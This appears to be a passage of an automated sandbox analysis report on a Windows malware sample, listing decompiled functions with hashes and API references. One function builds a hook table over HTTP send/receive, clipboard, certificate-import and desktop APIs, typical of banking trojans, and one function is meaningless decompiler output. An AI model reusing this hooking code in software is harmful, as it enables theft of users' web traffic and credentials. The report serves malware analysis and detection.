Instruction Fuzzy Hash: BD617271A44219AFDB10DAA5CC84EEF77B8EF44304F1445AAF911F7281DB78AE81CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041A525, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041A525(signed short* __eax, void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int* _t7;
				void* _t8;
				signed short* _t9;
				signed int _t10;
				signed int _t13;
				signed short _t14;
				void* _t15;

				_t16 = __eax;
				_t7 =  &_v8;
				_v8 = 0x104;
				__imp__GetUserNameExW(2, __eax, _t7, _t15, __ecx);
				if(_t7 == 0) {
					L8:
					_t8 = 6;
					_t9 = E00405B00(_t8, _t16);
				} else {
					_t10 = _v8;
					if(_t10 == 0) {
						goto L8;
					} else {
						 *((short*)(__eax + _t10 * 2)) = 0;
						_t9 = __eax;
						if( *((intOrPtr*)(__eax)) != 0) {
							do {
								_t13 =  *_t9 & 0x0000ffff;
								if(_t13 == 0x2f || _t13 == 0x5c) {
									_t14 = 0x7c;
									 *_t9 = _t14;
								}
								_t9 =  &(_t9[1]);
							} while ( *_t9 != 0);
						}
					}
				}
				return _t9;
			}

0x0041a52a
0x0041a52c
0x0041a533
0x0041a53a
0x0041a542
0x0041a576
0x0041a578
0x0041a579
0x0041a544
0x0041a544
0x0041a549
0x00000000
0x0041a54b
0x0041a54d
0x0041a551
0x0041a556
0x0041a558
0x0041a558
0x0041a55e
0x0041a567
0x0041a568
0x0041a568
0x0041a56b
0x0041a56e
0x0041a574
0x0041a556
0x0041a549
0x0041a580

APIs

GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0041A67C,?,?,00000000), ref: 0041A53A

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 77635d3ea06ffbda6b44b86e8a01936941a8b5ece78e28c4f6ae0931e94d267b
Instruction ID: 538225396efdd971b5e479c78a530fc63e3d4360a82f2c312a19ca144f3c355b
Opcode Fuzzy Hash: 77635d3ea06ffbda6b44b86e8a01936941a8b5ece78e28c4f6ae0931e94d267b
Instruction Fuzzy Hash: 4DF0F671A09304BADB349B9898056E733A9DF05750F54405BE406EB2E0E2B89DD0925E

Uniqueness

Uniqueness Score: -1.00%

Function 00406FAF, Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406FAF() {
				long _t7;
				signed int _t8;
				intOrPtr _t9;
				void* _t11;
				void* _t13;

				_t11 = _t13 - 0x78;
				_t7 = GetTimeZoneInformation(_t11 - 0x34);
				if(_t7 != 1) {
					if(_t7 != 2) {
						_t8 = 0;
					} else {
						_t9 =  *((intOrPtr*)(_t11 + 0x74));
						goto L4;
					}
				} else {
					_t9 =  *((intOrPtr*)(_t11 + 0x20));
					L4:
					_t8 = (_t9 +  *(_t11 - 0x34)) * 0xffffffc4;
				}
				return _t8;
			}

0x00406fb0
0x00406fbe
0x00406fc7
0x00406fd1
0x00406fde
0x00406fd3
0x00406fd3
0x00000000
0x00406fd3
0x00406fc9
0x00406fc9
0x00406fd6
0x00406fd9
0x00406fd9
0x00406fe4

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 00406FBE

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 81a8d4a7f76daaa5016d486e14e69b7a3d866444cd98cb0543a14aa2b758c59b
Instruction ID: 49fa538f8dd1471a71ffc8dbae4bb53e21d49f367db3c94685850a60e087f29e
Opcode Fuzzy Hash: 81a8d4a7f76daaa5016d486e14e69b7a3d866444cd98cb0543a14aa2b758c59b
Instruction Fuzzy Hash: D0E08C31A0400DCBDB20DBA4FF8189D77EAAB14314F220822F003F61C0E238EA668A06

Uniqueness

Uniqueness Score: -1.00%

Function 00404D18, Relevance: 1.4, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00404D18() {
				void* __ebx;
				intOrPtr _t1;
				intOrPtr _t7;
				signed int _t55;
				void* _t57;
				void* _t58;

				_t1 =  *0x42398c;
				if(_t1 == 0) {
					_t1 =  *0x423988;
					 *0x422024 = E00413CEC;
				} else {
					 *0x422024 = E00413DA3;
				}
				 *0x422020 = _t1;
				 *0x422030 =  *0x423998;
				 *0x422040 = GetFileAttributesExW;
				 *0x422050 = HttpSendRequestW;
				 *0x422060 = HttpSendRequestA;
				 *0x422070 = HttpSendRequestExW;
				_t7 = __imp__HttpSendRequestExA; // 0x70606830
				 *0x422080 = _t7;
				 *0x422090 = InternetCloseHandle;
				 *0x4220a0 = InternetReadFile;
				 *0x4220b0 = __imp__InternetReadFileExA;
				 *0x4220c0 = InternetQueryDataAvailable;
				 *0x4220d0 = HttpQueryInfoA;
				 *0x4220e0 = __imp__#3;
				 *0x4220f0 = __imp__#19;
				 *0x422100 = __imp__WSASend;
				 *0x422110 = OpenInputDesktop;
				 *0x422120 = SwitchDesktop;
				 *0x422130 = DefWindowProcW;
				 *0x422140 = DefWindowProcA;
				 *0x422150 = DefDlgProcW;
				 *0x422160 = DefDlgProcA;
				 *0x422170 = DefFrameProcW;
				 *0x422180 = DefFrameProcA;
				 *0x422190 = DefMDIChildProcW;
				 *0x4221a0 = DefMDIChildProcA;
				 *0x4221b0 = CallWindowProcW;
				 *0x4221c0 = CallWindowProcA;
				 *0x4221d0 = RegisterClassW;
				 *0x4221e0 = RegisterClassA;
				 *0x4221f0 = RegisterClassExW;
				 *0x422200 = RegisterClassExA;
				 *0x422210 = BeginPaint;
				 *0x422220 = EndPaint;
				 *0x422230 = GetDCEx;
				 *0x422240 = GetDC;
				 *0x422250 = GetWindowDC;
				 *0x422260 = ReleaseDC;
				 *0x422270 = GetUpdateRect;
				 *0x422280 = GetUpdateRgn;
				 *0x422290 = GetMessagePos;
				 *0x4222a0 = GetCursorPos;
				 *0x4222b0 = SetCursorPos;
				 *0x4222c0 = SetCapture;
				 *0x4222d0 = ReleaseCapture;
				 *0x4222e0 = GetCapture;
				 *0x4222f0 = GetMessageW;
				 *0x422300 = GetMessageA;
				 *0x422310 = PeekMessageW;
				 *0x422320 = PeekMessageA;
				 *0x422330 = TranslateMessage;
				_push(0x422020);
				 *0x422340 = GetClipboardData;
				_t55 = 0x34;
				 *0x422350 = __imp__PFXImportCertStore;
				return E00404C87(_t55, _t57, _t58);
			}

0x00404d18
0x00404d1f
0x00404d2d
0x00404d32
0x00404d21
0x00404d21
0x00404d21
0x00404d3c
0x00404d46
0x00404d50
0x00404d5a
0x00404d64
0x00404d6e
0x00404d73
0x00404d78
0x00404d82
0x00404d8c
0x00404d96
0x00404da0
0x00404daa
0x00404db4
0x00404dbe
0x00404dc8
0x00404dd2
0x00404ddc
0x00404de6
0x00404df0
0x00404dfa
0x00404e04
0x00404e0e
0x00404e18
0x00404e22
0x00404e2c
0x00404e36
0x00404e40
0x00404e4a
0x00404e54
0x00404e5e
0x00404e68
0x00404e72
0x00404e7c
0x00404e86
0x00404e90
0x00404e9a
0x00404ea4
0x00404eae
0x00404eb8
0x00404ec2
0x00404ecd
0x00404ed7
0x00404ee1
0x00404eeb
0x00404ef5
0x00404eff
0x00404f09
0x00404f13
0x00404f1d
0x00404f27
0x00404f31
0x00404f36
0x00404f42
0x00404f43
0x00404f4e

Strings

0h`p, xrefs: 00404D73

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: 0h`p
API String ID: 4275171209-2723391422
Opcode ID: 5b8e33e60777e3fea83f8966454d9b0cd230e3952f20e8336c747d9c03241aeb
Instruction ID: 92e1f1d8fc592594c7893f478b6e0e9fd0bf1c0395f6b048434305da64655aa0
Opcode Fuzzy Hash: 5b8e33e60777e3fea83f8966454d9b0cd230e3952f20e8336c747d9c03241aeb
Instruction Fuzzy Hash: 6B61B9B8A01201EFD3A1CF28EF80A507BE5B74C355384427AE909E7731E7B5A956CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00402823, Relevance: .2, Instructions: 236
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E00402823(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __fp0) {
				intOrPtr* _t95;
				void* _t96;
				void* _t98;
				intOrPtr* _t100;
				void* _t102;
				intOrPtr* _t104;
				signed char _t111;
				signed char _t112;
				signed char _t113;
				signed char _t114;
				signed char _t127;
				signed char _t128;
				signed char _t132;
				signed char _t133;
				void* _t165;
				void* _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				intOrPtr* _t172;
				intOrPtr* _t187;
				intOrPtr* _t188;
				void* _t189;
				intOrPtr* _t191;
				signed char _t195;
				intOrPtr* _t205;
				signed char _t213;
				signed char _t217;
				intOrPtr* _t224;
				intOrPtr* _t225;
				void* _t226;
				intOrPtr* _t229;
				void* _t230;
				intOrPtr* _t232;
				intOrPtr* _t233;
				void* _t236;
				intOrPtr* _t237;
				void* _t239;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t249;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;

				_t232 = __esi;
				_t168 = __ebx;
				_t205 = __edx + __ecx;
				 *__eax =  *__eax + __ebx;
				_t253 = _t252 + __ecx;
				 *_t205 =  *_t205 + __ebx;
				 *__esi =  *__esi + __ecx;
				_t95 = __eax + _t205;
				 *_t95 =  *_t95 + _t205;
				 *((intOrPtr*)(__ebx + 1)) =  *((intOrPtr*)(__ebx + 1)) + _t95;
				asm("rol byte [ecx], cl");
				_t224 = __edi + __ecx + 1;
				_t242 = _t241 + _t205;
				 *((intOrPtr*)(_t95 + 1)) =  *((intOrPtr*)(_t95 + 1)) + _t205;
				_pop(_t96);
				_t187 = __ecx + _t205 + __ebx;
				_t5 = __esi + 1;
				 *_t5 =  *((intOrPtr*)(__esi + 1)) + _t242;
				asm("fild dword [ecx]");
				if( *_t5 >= 0) {
					asm("fiadd word [ecx]");
				}
				 *((intOrPtr*)(_t205 + 1)) =  *((intOrPtr*)(_t205 + 1)) + _t253;
				asm("loopne 0x3");
				_push(_t242);
				_t169 = _t168 + _t253;
				 *_t169 =  *_t169 + _t96;
				_t243 = _t242 + _t253;
				 *_t205 =  *_t205 + _t224;
				_t233 = _t232 + _t253;
				 *_t224 =  *_t224 + _t96;
				 *0x1901ea01 =  *0x1901ea01 + _t187;
				_t254 = _t253 + _t243;
				 *_t169 =  *_t169 + _t169;
				_t225 = _t224 + _t243;
				 *_t225 =  *_t225 + _t187;
				_t98 = _t96 + _t243 + _t233;
				 *_t187 =  *_t187 + _t205;
				_t188 = _t187 + _t233;
				 *((intOrPtr*)(_t188 + _t98 - 0xe)) =  *((intOrPtr*)(_t188 + _t98 - 0xe)) + _t98;
				 *((intOrPtr*)(_t98 + 1)) =  *((intOrPtr*)(_t98 + 1)) + _t188;
				asm("cmc");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t205;
				asm("clc");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t169;
				asm("stc");
				 *((intOrPtr*)(_t225 + 1)) =  *((intOrPtr*)(_t225 + 1)) + _t243;
				asm("sti");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t233;
				 *_t188 =  *_t188 + 1;
				asm("arpl [ecx], ax");
				 *_t188 =  *_t188 + 1;
				_t100 =  *0xa6012602 +  *((intOrPtr*)(_t188 +  *0xa6012602));
				_t170 = _t169 +  *_t233;
				 *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) =  *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) + _t243;
				asm("daa");
				 *((intOrPtr*)(_t233 - 0x46fedafe)) =  *((intOrPtr*)(_t233 - 0x46fedafe)) + _t233;
				 *((intOrPtr*)(_t170 - 0x43fee0fe)) =  *((intOrPtr*)(_t170 - 0x43fee0fe)) + _t225;
				_t189 = _t188 +  *_t100;
				_t102 = _t100 +  *_t100 + _t170;
				_t171 = _t170 +  *((intOrPtr*)(_t189 + _t102));
				asm("insb");
				_t172 = _t171 +  *((intOrPtr*)(_t189 + _t102 - 0x1b));
				_t236 = _t233 + _t100 + _t171 + _t254;
				_t191 = _t189 +  *_t172 +  *((intOrPtr*)(_t189 +  *_t172));
				_t245 = _t243 + _t205 +  *_t188 +  *0xa02c501 + _t236;
				_t104 = _t102 +  *_t191 + _t225;
				_t237 = _t236 + _t225;
				 *0xa3013803 = _t104;
				asm("movsd");
				_t246 = _t245 +  *_t104;
				 *((intOrPtr*)(_t237 - 0x55fec4fd)) =  *((intOrPtr*)(_t237 - 0x55fec4fd)) + _t254;
				 *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) =  *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) + _t246;
				_push(_t225);
				 *((intOrPtr*)(_t246 - 0x49fed6fd)) =  *((intOrPtr*)(_t246 - 0x49fed6fd)) + _t237;
				_t226 = _t225 +  *((intOrPtr*)(_t191 + _t104));
				 *((intOrPtr*)(3 + _t104 + 0x3bd0167)) =  *((intOrPtr*)(3 + _t104 + 0x3bd0167)) + _t226;
				 *((intOrPtr*)(_t226 - 0x3ffeb4fd)) =  *((intOrPtr*)(_t226 - 0x3ffeb4fd)) + _t226;
				asm("rol byte [ebx], cl");
				_t239 = _t237 +  *_t237 +  *0xFFFFFFFFBB011304;
				_push(0x6a03de01);
				_t229 = _t226 + _t104 +  *_t104 + _t191 + _t254 +  *((intOrPtr*)(_t237 + 1)) +  *3 + _t191 - 1;
				_t249 = _t246 +  *_t237 +  *0xbb011303 +  *_t229;
				_t213 = 0xffffffffbb011302 +  *_t237 +  *_t229;
				_t230 = _t229 + _t249;
				asm("repne add ecx, [ebp+0x1]");
				asm("repe add esi, [edi]");
				_t195 = _t191 + 0xffffffff76022609 + _t239 + _t230;
				asm("std");
				_t251 = _t249 +  *((intOrPtr*)(0xffffffffbb011306)) +  *((intOrPtr*)(_t195 + 1));
				 *((char*)(0xffffffffbb011306)) =  *((char*)(0xffffffffbb011306)) + 1;
				_t111 = 0x3e +  *_t195 * 0x7e;
				 *(_t195 - 0x5dcffdfc) =  *(_t195 - 0x5dcffdfc) & _t111;
				_t112 = _t111 + 0xc;
				 *0xFFFFFFFF5F31200A =  *0xFFFFFFFF5F31200A ^ _t112;
				_t113 = _t112 + 1;
				 *(_t251 - 0x59cf04fc) =  *(_t251 - 0x59cf04fc) ^ _t113;
				_t114 = _t113 + 0xf2;
				 *(_t230 - 0x57cf5efc) =  *(_t230 - 0x57cf5efc) ^ _t114;
				 *(_t195 - 0x55cf5afc) =  *(_t195 - 0x55cf5afc) ^ _t195;
				 *0xFFFFFFFF6731BC0A =  *0xFFFFFFFF6731BC0A ^ _t195;
				 *(_t251 - 0x51cf1afc) =  *(_t251 - 0x51cf1afc) ^ _t195;
				 *(_t230 - 0x4fcf3cfc) =  *(_t230 - 0x4fcf3cfc) ^ _t195;
				 *(_t195 - 0x4dcf5dfc) =  *(_t195 - 0x4dcf5dfc) ^ _t213;
				 *0xFFFFFFFF6F31B90A =  *0xFFFFFFFF6F31B90A ^ _t213;
				 *(_t251 - 0x49cf55fc) =  *(_t251 - 0x49cf55fc) ^ _t213;
				 *(_t230 - 0x47cf52fc) =  *(_t230 - 0x47cf52fc) ^ _t213;
				 *(_t195 - 0x45cf4efc) =  *(_t195 - 0x45cf4efc) ^ 0xffffffffbb011306;
				 *0xFFFFFFFF7731C80A =  *0xFFFFFFFF7731C80A ^ 0xffffffffbb011306;
				 *(_t251 - 0x41cf46fc) =  *(_t251 - 0x41cf46fc) ^ 0xffffffffbb011306;
				 *(_t230 - 0x3fcf42fc) =  *(_t230 - 0x3fcf42fc) ^ 0xffffffffbb011306;
				_t127 = _t114 + 0x99a;
				_t128 = _t127 + 0xc1;
				_t132 = (_t128 + 0x18a ^ _t128 + 0x18a) + 0xc8;
				_t133 = _t132 + 0xca;
				_t217 = _t213 ^ _t128 ^ _t133 ^ 0;
				_t165 = ((((((_t133 + 0x197 ^ _t195 ^ _t127 ^ _t132) + 0x33c ^ 0) + 0x366 ^ _t217) + 0x382 ^ 0) + 0x39b ^ 0x00000003) + 0x3ae ^ 0) + 0x319;
				 *(_t251 + _t165 + 0x5bb060c) =  *(_t251 + _t165 + 0x5bb060c) ^ 0 ^ _t217 ^ 3;
				asm("sbb eax, [esi]");
				return _t165 + 0x05c20621 &  *(_t239 +  *0xFFFFFFFFBB011307);
			}

0x00402823
0x00402823
0x00402823
0x00402825
0x00402827
0x00402829
0x0040282d
0x0040282f
0x00402831
0x00402835
0x00402838
0x0040283a
0x0040283b
0x0040283d
0x00402842
0x00402843
0x00402845
0x00402845
0x00402848
0x0040284a
0x0040284c
0x0040284c
0x0040284d
0x00402850
0x00402852
0x00402853
0x00402855
0x00402857
0x00402859
0x0040285b
0x0040285d
0x00402861
0x00402867
0x00402869
0x0040286b
0x0040286d
0x0040286f
0x00402871
0x00402873
0x00402875
0x00402879
0x0040287c
0x0040287d
0x00402880
0x00402881
0x00402884
0x00402885
0x00402888
0x00402889
0x0040288c
0x0040288e
0x00402890
0x00402899
0x004028a1
0x004028a3
0x004028aa
0x004028ab
0x004028b3
0x004028c1
0x004028c7
0x004028c9
0x004028ce
0x004028d1
0x004028d7
0x004028d9
0x004028db
0x004028df
0x004028e7
0x004028ec
0x004028f4
0x004028f5
0x004028f7
0x004028ff
0x0040290a
0x0040290b
0x00402911
0x0040291b
0x00402923
0x0040293c
0x00402945
0x0040294a
0x00402953
0x00402955
0x00402959
0x0040295b
0x00402964
0x00402968
0x0040296b
0x00402970
0x00402971
0x00402974
0x00402979
0x0040297b
0x00402981
0x00402983
0x00402989
0x0040298b
0x00402991
0x00402993
0x0040299b
0x004029a3
0x004029ab
0x004029b3
0x004029bb
0x004029c3
0x004029cb
0x004029d3
0x004029db
0x004029e3
0x004029eb
0x004029f3
0x004029f9
0x004029fd
0x00402a09
0x00402a0d
0x00402a2f
0x00402a75
0x00402a77
0x00402a7e
0x00402a8c

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad2754d04f935819338fa239dfe4fe083a04389e42129f0e7cc6df87192f32c2
Instruction ID: ee94607f001413235f200fca77bdf514b41922a2640aec83ec5b9f8aeb6c8548
Opcode Fuzzy Hash: ad2754d04f935819338fa239dfe4fe083a04389e42129f0e7cc6df87192f32c2
Instruction Fuzzy Hash: 5381B5319893918BC795EF38C8D55D6BBB1EE4322432D85DDC8940EA03E22F651BDF51

Uniqueness

Uniqueness Score: -1.00%

Function 00409BD8, Relevance: .2, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00409BD8(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				unsigned int _t67;
				signed int _t68;
				intOrPtr _t71;
				void* _t79;
				signed int _t81;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				unsigned int _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				intOrPtr* _t119;
				unsigned int _t125;
				signed int _t126;
				signed int _t128;

				_t71 = _a4;
				_t98 = 0;
				_t99 = 0;
				_v16 = 0;
				_v20 = 1;
				L1:
				while(1) {
					if(_t99 == 0) {
						_t103 =  *(_t98 + _t71);
						_t98 = _t98 + 4;
						_t99 = 0x1f;
						_t104 = _t103 >> 0x1f;
					} else {
						_t99 = _t99 - 1;
						_t104 = _t67 >> _t99 & 0x00000001;
					}
					if(_t104 != 0) {
						_v16 = _v16 + 1;
						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
						_t98 = _t98 + 1;
						L6:
						_t71 = _a4;
						continue;
					}
					_v12 = 1;
					do {
						if(_t99 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t100 = 0x1f;
							_t106 = _t67 >> 0x1f;
						} else {
							_t100 = _t99 - 1;
							_t106 = _t67 >> _t100 & 0x00000001;
						}
						_v12 = _t106 + _v12 * 2;
						if(_t100 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t108 = _t67 >> 0x1f;
						} else {
							_t99 = _t100 - 1;
							_t108 = _t67 >> _t99 & 0x00000001;
						}
					} while (_t108 == 0);
					_t111 = _v12;
					if(_t111 == 2) {
						_t81 = _v20;
						L19:
						_v12 = _t81;
						if(_t99 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t101 = 0x1f;
							_v8 = _t67 >> 0x1f;
						} else {
							_t101 = _t99 - 1;
							_v8 = _t67 >> _t101 & 0x00000001;
						}
						if(_t101 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t115 = _t67 >> 0x1f;
						} else {
							_t99 = _t101 - 1;
							_t115 = _t67 >> _t99 & 0x00000001;
						}
						_t116 = _t115 + _v8 * 2;
						_v8 = _t116;
						if(_t116 == 0) {
							_v8 = 1;
							do {
								if(_t99 == 0) {
									_t125 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t102 = 0x1f;
									_t126 = _t125 >> 0x1f;
								} else {
									_t102 = _t99 - 1;
									_t126 = _t67 >> _t102 & 0x00000001;
								}
								_v8 = _t126 + _v8 * 2;
								if(_t102 == 0) {
									_t67 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t99 = 0x1f;
									_t128 = _t67 >> 0x1f;
								} else {
									_t99 = _t102 - 1;
									_t128 = _t67 >> _t99 & 0x00000001;
								}
							} while (_t128 == 0);
							_v8 = _v8 + 2;
						}
						asm("sbb ecx, ecx");
						_v8 = _v8 +  ~0xd00;
						_t87 = _v16;
						_t119 = _t87 - _v12 + _a12;
						_v16 = _t119;
						 *((char*)(_t87 + _a12)) =  *_t119;
						_t88 = _t87 + 1;
						_v16 = _v16 + 1;
						do {
							 *((char*)(_t88 + _a12)) =  *_v16;
							_t88 = _t88 + 1;
							_v16 = _v16 + 1;
							_t57 =  &_v8;
							 *_t57 = _v8 - 1;
						} while ( *_t57 != 0);
						_v16 = _t88;
						goto L6;
					}
					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
					_t98 = _t98 + 1;
					if(_t79 != 0xffffffff) {
						_t81 = _t79 + 1;
						_v20 = _t81;
						goto L19;
					}
					_t68 = _a16;
					 *_t68 = _v16;
					return _t68 & 0xffffff00 | _t98 == _a8;
				}
			}

0x00409bdf
0x00409be3
0x00409be8
0x00409bea
0x00409bed
0x00000000
0x00409bf4
0x00409bf6
0x00409c09
0x00409c0b
0x00409c0e
0x00409c0f
0x00409bf8
0x00409bf8
0x00409bff
0x00409bff
0x00409c14
0x00409c1f
0x00409c22
0x00409c25
0x00409c26
0x00409c26
0x00000000
0x00409c26
0x00409c2b
0x00409c32
0x00409c34
0x00409c42
0x00409c49
0x00409c4c
0x00409c4d
0x00409c36
0x00409c36
0x00409c3d
0x00409c3d
0x00409c56
0x00409c5b
0x00409c69
0x00409c70
0x00409c73
0x00409c74
0x00409c5d
0x00409c5d
0x00409c64
0x00409c64
0x00409c77
0x00409c7b
0x00409c81
0x00409c83
0x00409ca2
0x00409ca2
0x00409ca7
0x00409cb8
0x00409cbd
0x00409cc5
0x00409cc6
0x00409ca9
0x00409ca9
0x00409cb3
0x00409cb3
0x00409ccb
0x00409cd9
0x00409ce0
0x00409ce3
0x00409ce4
0x00409ccd
0x00409ccd
0x00409cd4
0x00409cd4
0x00409cea
0x00409ced
0x00409cf2
0x00409cf4
0x00409cfb
0x00409cfd
0x00409d10
0x00409d12
0x00409d15
0x00409d16
0x00409cff
0x00409cff
0x00409d06
0x00409d06
0x00409d1f
0x00409d24
0x00409d32
0x00409d39
0x00409d3c
0x00409d3d
0x00409d26
0x00409d26
0x00409d2d
0x00409d2d
0x00409d40
0x00409d44
0x00409d44
0x00409d50
0x00409d54
0x00409d57
0x00409d5f
0x00409d64
0x00409d6a
0x00409d6d
0x00409d6e
0x00409d71
0x00409d79
0x00409d7c
0x00409d7d
0x00409d80
0x00409d80
0x00409d80
0x00409d85
0x00000000
0x00409d85
0x00409c92
0x00409c94
0x00409c98
0x00409c9e
0x00409c9f
0x00000000
0x00409c9f
0x00409d8d
0x00409d98
0x00409d9f
0x00409d9f

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
Instruction ID: 29e2a8d33b46208c2f9b4f3b524dc552ea55eef337b6bafcba57101aa6beebb7
Opcode Fuzzy Hash: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
Instruction Fuzzy Hash: 5651C032E04A259BEB14CE58C4506ADF7B1EF85324F1A42BACD16BF3C6C634AD41DB84

Uniqueness

Uniqueness Score: -1.00%

Function 00408036, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00408036() {
				signed int _t23;
				signed int _t43;
				signed int _t59;
				signed int* _t63;
				signed int _t64;

				_t23 =  *0x4231ac;
				if(_t23 >= 0x270) {
					_t64 = 0;
					do {
						_t59 = _t64;
						_t64 = _t64 + 1;
						0x4227e0[_t59] = (( *(0x4227e4 + _t59 * 4) ^ 0x4227e0[_t59]) & 0x7fffffff ^ 0x4227e0[_t59]) >> 0x00000001 ^  *(0x4223a0 + ((( *(0x4227e4 + _t59 * 4) ^ 0x4227e0[_t59]) & 0x7fffffff ^ 0x4227e0[_t59]) & 0x00000001) * 4) ^  *(0x422e14 + _t59 * 4);
					} while (_t64 < 0xe3);
					if(_t64 < 0x26f) {
						_t63 =  &(0x4227e0[_t64]);
						do {
							 *_t63 =  *(0x4223a0 + ((( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) & 0x00000001) * 4) ^  *(_t63 - 0x38c) ^ (( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) >> 0x00000001;
							_t63 =  &(_t63[1]);
						} while (_t63 < 0x42319c);
					}
					_t43 =  *0x4227e0; // 0x0
					 *0x42319c = ((_t43 ^  *0x42319c) & 0x7fffffff ^  *0x42319c) >> 0x00000001 ^  *(0x4223a0 + (((_t43 ^  *0x42319c) & 0x7fffffff ^  *0x42319c) & 0x00000001) * 4) ^  *0x422e10;
					_t23 = 0;
				}
				 *0x4231ac = _t23 + 1;
				return (0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
			}

0x00408036
0x00408040
0x00408048
0x0040804f
0x0040804f
0x0040807d
0x0040807e
0x00408085
0x00408093
0x00408095
0x0040809c
0x004080bb
0x004080bd
0x004080c0
0x0040809c
0x004080ce
0x004080ef
0x004080f4
0x004080f4
0x004080fe
0x00408129

Memory Dump Source

